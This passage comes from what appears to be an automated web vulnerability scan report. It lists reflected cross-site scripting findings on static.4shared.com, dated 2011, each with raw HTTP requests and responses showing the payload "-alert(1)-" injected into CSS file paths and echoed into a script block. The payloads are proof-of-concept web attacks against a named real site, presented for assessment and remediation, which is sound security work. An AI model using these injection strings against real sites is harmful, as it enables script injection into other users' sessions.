User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css658a0&quot;-alert(1)-&quot;488f25f19da/coolbuttons.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=982CF7DB786472C50698080400077D8F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:14 GMT
Content-Length: 36179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css658a0"-alert(1)-"488f25f19da/coolbuttons.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

3.380. http://static.4shared.com/css/coolbuttons.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/coolbuttons.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebafb"-alert(1)-"74fc1488d18 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/coolbuttons.cssebafb"-alert(1)-"74fc1488d18?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/coolbuttons.cssebafb&quot;-alert(1)-&quot;74fc1488d18
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=272DE1FC343CD7FCD18B47BB2B44D346.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:17 GMT
Content-Length: 36190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/coolbuttons.cssebafb"-alert(1)-"74fc1488d18";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.381. http://static.4shared.com/css/features.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/features.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d0b9"-alert(1)-"5faf4995697 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css4d0b9"-alert(1)-"5faf4995697/features.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css4d0b9&quot;-alert(1)-&quot;5faf4995697/features.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FFA7B8C14C0841DA4DF96AD5595073B3.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:52 GMT
Content-Length: 36175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css4d0b9"-alert(1)-"5faf4995697/features.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.382. http://static.4shared.com/css/features.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/features.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79d0d"-alert(1)-"e9d06030ced was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/features.css79d0d"-alert(1)-"e9d06030ced?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/features.css79d0d&quot;-alert(1)-&quot;e9d06030ced
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7754151BBD15078673114ABBBD9C8243.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:55 GMT
Content-Length: 36175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/features.css79d0d"-alert(1)-"e9d06030ced";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.383. http://static.4shared.com/css/indexm.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/indexm.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae0da"-alert(1)-"dfc773bc8e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssae0da"-alert(1)-"dfc773bc8e7/indexm.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssae0da&quot;-alert(1)-&quot;dfc773bc8e7/indexm.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8F0322F63B8CACFDC0DAC3DC1897D6ED.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:49 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssae0da"-alert(1)-"dfc773bc8e7/indexm.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.384. http://static.4shared.com/css/indexm.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/indexm.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adf03"-alert(1)-"db77fbbc575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/indexm.cssadf03"-alert(1)-"db77fbbc575?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/indexm.cssadf03&quot;-alert(1)-&quot;db77fbbc575
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=39624D051F6790D250B45932474C8DCE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:52 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/indexm.cssadf03"-alert(1)-"db77fbbc575";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.385. http://static.4shared.com/css/indexn.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/indexn.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c9ed"-alert(1)-"c9db170bdcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css8c9ed"-alert(1)-"c9db170bdcd/indexn.css?ver=1610 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /css8c9ed&quot;-alert(1)-&quot;c9db170bdcd/indexn.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E53A1B83159954CF79DC975D021B4F60.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:37:07 GMT
Content-Length: 36184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css8c9ed"-alert(1)-"c9db170bdcd/indexn.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.386. http://static.4shared.com/css/indexn.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/indexn.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c78e"-alert(1)-"58cbf041f37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/indexn.css9c78e"-alert(1)-"58cbf041f37?ver=1610 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /css/indexn.css9c78e&quot;-alert(1)-&quot;58cbf041f37
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=179999491542BAC1D4F65691626D2CEE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:37:10 GMT
Content-Length: 36184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/indexn.css9c78e"-alert(1)-"58cbf041f37";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.387. http://static.4shared.com/css/main.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c985c"-alert(1)-"b752c3bde16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssc985c"-alert(1)-"b752c3bde16/main.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssc985c&quot;-alert(1)-&quot;b752c3bde16/main.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=62828B98EDCEF6917906D0ED8AD17B11.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:49 GMT
Content-Length: 36155


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssc985c"-alert(1)-"b752c3bde16/main.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.388. http://static.4shared.com/css/main.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf57b"-alert(1)-"ff7366fe274 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/main.csscf57b"-alert(1)-"ff7366fe274?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/main.csscf57b&quot;-alert(1)-&quot;ff7366fe274
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3FD90ABD1F134D0ADB55B51E7E5F639F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:53 GMT
Content-Length: 36155


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/main.csscf57b"-alert(1)-"ff7366fe274";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.389. http://static.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a73d5"-alert(1)-"09846515e43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssa73d5"-alert(1)-"09846515e43/mainWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssa73d5&quot;-alert(1)-&quot;09846515e43/mainWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F38DB9F45A136E8B221A34E2337C577E.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:21 GMT
Content-Length: 36209


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssa73d5"-alert(1)-"09846515e43/mainWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

3.390. http://static.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33792"-alert(1)-"feb36199e90 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/mainWithoutCommon.css33792"-alert(1)-"feb36199e90 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/mainWithoutCommon.css33792&quot;-alert(1)-&quot;feb36199e90
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=97181302BAA485314ABDA1BF00198219.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:28 GMT
Content-Length: 36220


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/mainWithoutCommon.css33792"-alert(1)-"feb36199e90";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.391. http://static.4shared.com/css/openid.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/openid.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37d0c"-alert(1)-"a384906c899 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css37d0c"-alert(1)-"a384906c899/openid.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css37d0c&quot;-alert(1)-&quot;a384906c899/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7860F21A48FF0DD57CAE4EFCFF42B9F4.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:16 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css37d0c"-alert(1)-"a384906c899/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.392. http://static.4shared.com/css/openid.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/openid.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 872dc"-alert(1)-"012793f9b37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/openid.css872dc"-alert(1)-"012793f9b37?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/openid.css872dc&quot;-alert(1)-&quot;012793f9b37
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=626301118D083DFBF62DC91BC8AAF9A1.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:20 GMT
Content-Length: 36154


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/openid.css872dc"-alert(1)-"012793f9b37";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.393. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/download.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5430c"-alert(1)-"af2ee37e7b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css5430c"-alert(1)-"af2ee37e7b0/pageDownload1/download.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css5430c&quot;-alert(1)-&quot;af2ee37e7b0/pageDownload1/download.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B6094042F2C403249AB360C71A1BE8A9.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:17 GMT
Content-Length: 36245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css5430c"-alert(1)-"af2ee37e7b0/pageDownload1/download.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

3.394. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
